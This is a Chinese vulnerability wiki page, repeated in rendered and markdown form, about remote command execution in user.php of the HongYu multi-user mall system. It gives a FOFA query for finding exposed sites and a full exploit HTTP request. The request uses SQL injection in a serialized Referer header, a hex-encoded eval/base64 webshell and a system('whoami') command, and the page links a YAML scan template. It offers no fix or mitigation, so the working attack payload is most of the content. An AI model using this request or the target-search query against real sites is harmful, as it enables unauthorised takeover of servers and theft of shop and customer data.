fofamini-wiki

登录白背景

源码

鸿宇多用户商城user.php存在远程命令执行漏洞

一、漏洞简介

鸿宇多用户商城系统是一款B2B2C新零售电商系统。鸿宇多用户商城user.php存在远程命令执行漏洞，攻击者可利用该漏洞获取服务器权限。

二、影响版本

鸿宇多用户商城系统

三、资产测绘

fofabody="content=HongYuJD" && body="68ecshopcom_360buy"
特征

四、漏洞复现

POST /user.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:233:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243686959584e6c4e6a52665a47566a6232526c4b435266554539545646747961574e7258536b704f773d3d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca
Accept-Encoding: gzip
Connection: close
 
action=login&rick={{base64(echo(system("whoami"));)}}

命令需要base64编码

hydyhsc-user-rce.yaml

原文: https://www.yuque.com/xiaokp7/ocvun2/qh686h4nd50asgvs

# 鸿宇多用户商城user.php存在远程命令执行漏洞

# 一、漏洞简介
鸿宇多用户商城系统是一款B2B2C新零售电商系统。鸿宇多用户商城user.php存在远程命令执行漏洞，攻击者可利用该漏洞获取服务器权限。

# 二、影响版本

- 鸿宇多用户商城系统

# 三、资产测绘

- fofa`body="content=HongYuJD" && body="68ecshopcom_360buy"`
- 特征

![image.png](./img/QIMqZIpk88dABtRk/1711265285166-0293aa0c-acc4-44e5-9454-c6eeb2ac7a81-235221.png)

# 四、漏洞复现
```
POST /user.php HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Referer: 554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:233:"*/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b6576616c09286261736536345f6465636f64650928275a585a686243686959584e6c4e6a52665a47566a6232526c4b435266554539545646747961574e7258536b704f773d3d2729293b2f2f7d787878,10-- -";s:2:"id";s:11:"-1' UNION/*";}554fcae493e564ee0dc75bdf2ebf94ca
Accept-Encoding: gzip
Connection: close
 
action=login&rick={{base64(echo(system("whoami"));)}}
```
命令需要base64编码
![image.png](./img/QIMqZIpk88dABtRk/1711265340099-3501c6fa-9862-468e-99ae-74eb8379daab-272491.png)
[hydyhsc-user-rce.yaml](https://www.yuque.com/attachments/yuque/0/2024/yaml/1622799/1713251910638-1ac3edd1-7077-4d57-a03b-4419431b3456.yaml?_lake_card=%7B%22src%22%3A%22https%3A%2F%2Fwww.yuque.com%2Fattachments%2Fyuque%2F0%2F2024%2Fyaml%2F1622799%2F1713251910638-1ac3edd1-7077-4d57-a03b-4419431b3456.yaml%22%2C%22name%22%3A%22hydyhsc-user-rce.yaml%22%2C%22size%22%3A1021%2C%22ext%22%3A%22yaml%22%2C%22source%22%3A%22%22%2C%22status%22%3A%22done%22%2C%22download%22%3Atrue%2C%22taskId%22%3A%22u992ee149-eba2-4db9-9ed7-f249cda8110%22%2C%22taskType%22%3A%22upload%22%2C%22type%22%3A%22application%2Fx-yaml%22%2C%22__spacing%22%3A%22both%22%2C%22id%22%3A%22u272750fa%22%2C%22margin%22%3A%7B%22top%22%3Atrue%2C%22bottom%22%3Atrue%7D%2C%22card%22%3A%22file%22%7D)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qh686h4nd50asgvs>